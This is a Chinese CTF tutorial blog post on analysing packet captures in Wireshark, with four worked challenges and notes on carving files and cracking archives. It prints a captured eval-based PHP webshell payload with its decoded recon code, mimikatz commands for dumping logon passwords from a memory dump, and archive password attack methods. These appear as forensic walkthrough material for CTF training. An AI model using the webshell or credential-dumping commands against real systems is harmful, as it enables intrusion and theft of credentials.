CTF流量分析总结及例题

2,455 阅读8分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路

web流量分析基本套路

  1. 流量分析传输了数据:zip rar png jpg txt mp3,特别是流量包比较大时需要注意
  2. binwalk分离文件,grep或者wireshark内ctrl+f搜索
  3. 分情况使用导出对象,导出分组字节流,原始数据
  4. 搜索时可以看情况搜索分组详情、分组字节流
  5. 查看包间的差异,可以按大小排列数据包等
  6. png在流量中经常以base64形式出现
  7. 如果有TLS,要么找密钥,要么看别的协议

例题一普通http流量

使用wireshark打开文件

可以点击Protocol,按协议进行排序

也可以直接按请求方式过滤

http.request.method == "GET"
http.request.method == "POST"

发现大部分请求都是404,有三个成功,并且是编码数据

image-20210911204435287

点击右击选择追踪流->http流

image-20210911204546794

进行base64解码

第二个是flag.txt

image-20210911204658158

找到流量右击选择导出分组字节流

因为url访问的是

print_r(gzcompress(file_get_contents(base64_decode(%22ZmxhZy50eHQ%22))));

需要解码

gzcompress
相反的函数就是
gzuncompress

decode.php

<?php
$file=file_get_contents("./flag.bin");
$file=gzuncompress($file);
var_dump($file);
?>

image-20210911205548145

得到flag

例题二http传输文件流量

image-20210911211719258

文件比较大

使用wireshark打开,按协议排序

image-20210911211809942

追踪TCP流

image-20210911211846368

发现可疑代码,解码整理一下

yo=@eval(base64_decode($_POST[z0]));
&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw==
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

其他HTTP流量中也没有什么重要信息,选择追踪TCP流,在流21,发现rar文件,选择原始数据,另存为

image-20210911213325427

这是把整个数据包都保存下来了,在本地打开rar文件,如果打不开文件,使用010打开,把无用内容删除

image-20210911213607394

打开rar压缩包发现被加密了,因为这是到流量题,有限考虑去流量中找密码,其次是考虑压缩包的各种考点

这个压缩包肯定是传过来之前被加密的,所以需要向前找,看看流量中有什么

在的流量中可以看到传了三个变量,z0,z1,z2,其中z2解码之后就是每次执行的命令,从流21开始依次向前解码z2,发现流18,base64解码内容为

cd /d "c:\inetpub\wwwroot\"&C:\progra~1\WinRAR\rar a C:\Inetpub\wwwroot\backup\wwwroot.rar C:\Inetpub\wwwroot\backup\1.gif -hpJJBoom&echo [S]&cd&echo [E]

大概就是在cmd中调用了winrar,加密文件并设置密码

hp[password] 加密文件数据和文件头

密码就是JJBoom了,解压文件

image-20210911221648896

但是图片并不能查看,用010打开

image-20210911221943094

文件头是MDMP,说明这是Dump文件或用linux下的file命令查看文件格式

Dump文件是进程的内存镜像,可以把程序的执行状态通过调试器保存到dump文件中。Dump文件是用来给驱动程序编写人员调试驱动程序用的,这种文件必须用专用工具软件打开,比如使用WinDbg打开

需要使用猕猴桃mimikatz打开

使用以下三条命令

log d:\1.txt	//将回显输出到一个文件中
sekurlsa::minidump 1.gif	//载入dmp文件
sekurlsa::logonpasswords full	//读取登录密码

登录密码就是flag

image-20210911224152322

总结:

  1. 如果数据包比较大,可以追踪流再保存,数据包小的话可以直接使用保存分组字节流
  2. 数据流量比较多的话,在wireshark中可以使用统计->conversations进行查看

例题三https加密流量

一个pcap文件一个txt文档

txt文档内容为题目的提示

提示一:若感觉在中间某个容易出错的步骤,若有需要检验是否正确时,可以比较MD5: 90c490781f9c320cd1ba671fcb112d1c
提示二:注意补齐私钥格式
-----BEGIN RSA PRIVATE KEY-----
XXXXXXX
-----END RSA PRIVATE KEY-----

打开流量包没有发现http,但是存在TLS协议,判断采用了https,需要密钥解码

image-20210912092757526

继续分析其他协议,翻一遍smtp,发现一张经过base64图片

image-20210912093934970

选择show data as 原始数据,另存为1.txt,把多余的信息删除,只保留base64

使用脚本将base64转换成图片

import base64
f=open("data.txt","r")
f2=open("1.png","wb")
content=base64.b64decode(f.read())
f2.write(content)
f.close()    
f2.close()

1

生成的图片,可以联想到HTTPS的私钥,使用ocr进行识别,我用的是qq识屏,识别后点击下载,保存数据,python简单处理下除掉多余的空格

因为题目提示了中间容易出错的地方大概就是这里了,对一下md5值不对,头大了,需要一个个的对比

将字符前后加上RSA的标记,保存文档

image-20210912201813464

在wireshark中添加私钥文件

  1. 编辑->首选项->选择协议TLS->选择RSA keys list->点击Edit

  2. 在弹出的窗口中点击左下角加号->在Key File中选择文件->点击ok

    image-20210912201442323

添加完成,wireshark会自动刷新,搜索http协议,追踪流就可以看到flag

例题四视频流

两个点

  1. 视频信息在流量包中使用UDP协议进行传输
  2. png,jpg等图片信息只要头尾标记在,图片外多余的数据不会影响显示

打开流量包,首先关注http协议,选中第一个http包右键选择追踪http流

image-20210912221527962

在流中发现大量与视频相关的字眼,并且没有发现关于flag的信息,既然与视频相关就去看udp包

image-20210912221728290

在流中发现jpg图片

jpg图片含有的明显特征

image-20210912221829181

将这个流选择原始数据并保存,数据很多需要等待一会儿避免漏掉

因为整个流中有很多jpg图片所以需要使用脚本分割

f = open("./pcap","rb")
data = f.read()
sub = 0
f.seek(0)
while 1:
    if f.read(3) == b'\xff\xd8\xff':
        f1 = open(str(sub) + '.jpg', "wb")
        f1.write(data[f.tell()-3:])
        f1.close()
        sub += 1
    else:
        f.seek(-2, 1)

代码解释

  • b'\xff\xd8\xff' jpg格式文件头

  • f.seek() 函数用于将文件指针移动至指定位置

    file.seek(offset[, whence])
    
    其中,各个参数的含义如下:
    file:表示文件对象;
    whence:作为可选参数,用于指定文件指针要放置的位置,该参数的参数值有 3 个选择:0 代表文件头(默认值)、1 代表当前位置、2 代表文件尾。
    offset:表示相对于 whence 位置文件指针的偏移量,正数表示向后偏移,负数表示向前偏移。例如,当whence == 0 &&offset == 3(即 seek(3,0) ),表示文件指针移动至距离文件开头处 3 个字符的位置;当whence == 1 &&offset == 5(即 seek(5,1) ),表示文件指针向后移动,移动至距离当前位置 5 个字符处。
    注意,当 offset 值非 0 时,Python 要求文件必须要以二进制格式打开,否则会抛出 io.UnsupportedOperation 错误。
    
  • f.tell(3) 输出当前文件指针位置

    tell实例

    读取 a.txt 的代码如下:
    f = open("a.txt",'r')
    print(f.tell())
    print(f.read(3))
    print(f.tell())
    运行结果为:
    0
    htt
    3
    

    当使用 open() 函数打开文件时,文件指针的起始位置为 0,表示位于文件的开头处,当使用 read() 函数从文件中读取 3 个字符之后,文件指针同时向后移动了 3 个字符的位置。这就表明,当程序使用文件对象读写数据时,文件指针会自动向后移动:读写了多少个数据,文件指针就自动向后移动多少个位置

代码意思就是每次读取文件三个字节,判断是不是jpg的文件头,注意此时文件指针已经发生了变化向后移动了两位,如果是文件头就将当前指针位置到末尾的全部数据保存为jpg,也就是说生成的jpg图片大小会越来越小,如果不是jpg的文件头,文件指针就从当前位置向前移动两位继续判断

前置知识

  • file 根据文件头,识别文件类型,如果文件头前边有数据就识别不出来了

  • strings 输出文件中的可打印字符

    可以发现一些提示信息或者特殊编码的信息

    可以配合-o参数获取所有的ASCII字符偏移(字符串的位置)

  • binwalk命令

    根据文件头识别文件

    -e提取文件

  • foremost命令

    提取文件,建议两个分离命令都试一遍

  • 各种文件头

    本地搜索:文件头

压缩包

基本思路

  1. 尽量用winrar避免异常
  2. 看属性
  3. 伪加密
  4. 暴力破解
  5. 明文攻击
  6. crc32碰撞
  7. 多个压缩文件合并 cat 文件名(按需) > 保存文件名

文件结构

[记录文件头 + 文件结构 + 数据描述符] {此处可重复多次} + 核心目录 + 目录结束标识

暴力破解密码

仅适用于密码长度小于等于6位的,大于6位时间会非常的长

直接用apchpr爆破

zip伪加密

原理:

记录文件头以及核心目录区存在一个通用位标记(General purpose bit flag)的两个字节,不同的比特位有着不同的涵义

无加密:
压缩源文件数据区(ushort frFlags)的全局加密应当为 00 00,
且压缩源文件目录区的全局方式标记(ushort deFlags)应当为00 00

伪加密
压缩源文件数据区的全局加密应当为 00 00
且压缩文件目录区的全局方式标记应当为 09 00

真加密
压缩源文件数据区的全局加密应当为 09 00
且压缩源文件目录区的全局方式应当为 09 00

image-20210913205610015

​ 修复工具:

  • winrar修复(也可以修复其他的修改内容) 工具->修复

  • binwalk foremost无视伪加密

  • ZipCenOp.jar(win)

    找到所在文件夹,在地址栏输入cmd

    java -jar ZipCenOp.jar r 文件名
    

CRC32碰撞

原理:

压缩包的crc32的值是未加密状态计算来的

如果文件内容很少(4字节左右)加密的密码却很长,可以使用crc32爆破获取原文件的内容

脚本F:\CTF\CTF工具合集\脚本\CRC32碰撞\crc32-linux.py

明文攻击

基本条件

  • 一个加密的压缩包文件
  • 已知压缩文件的压缩工具,如winrar,7z
  • 已知压缩工具的版本
  • 已知压缩包文件中部分连续的内容,至少12字节,任意文件

方法

  1. 将明文文件压缩成压缩包
  2. 确认两者的压缩方式相同,即对比压缩之后的crc32值
  3. 使用apchpr进行明文攻击

tips:

image-20210913213429666

在攻击过程中密钥框如果有字符了就可以停止攻击,点击右侧使用已知密钥解密按钮

docx

包含xml文件的zip压缩包

可能隐藏文件,信息在压缩包里,在word中看不到

可以将docx后缀改为zip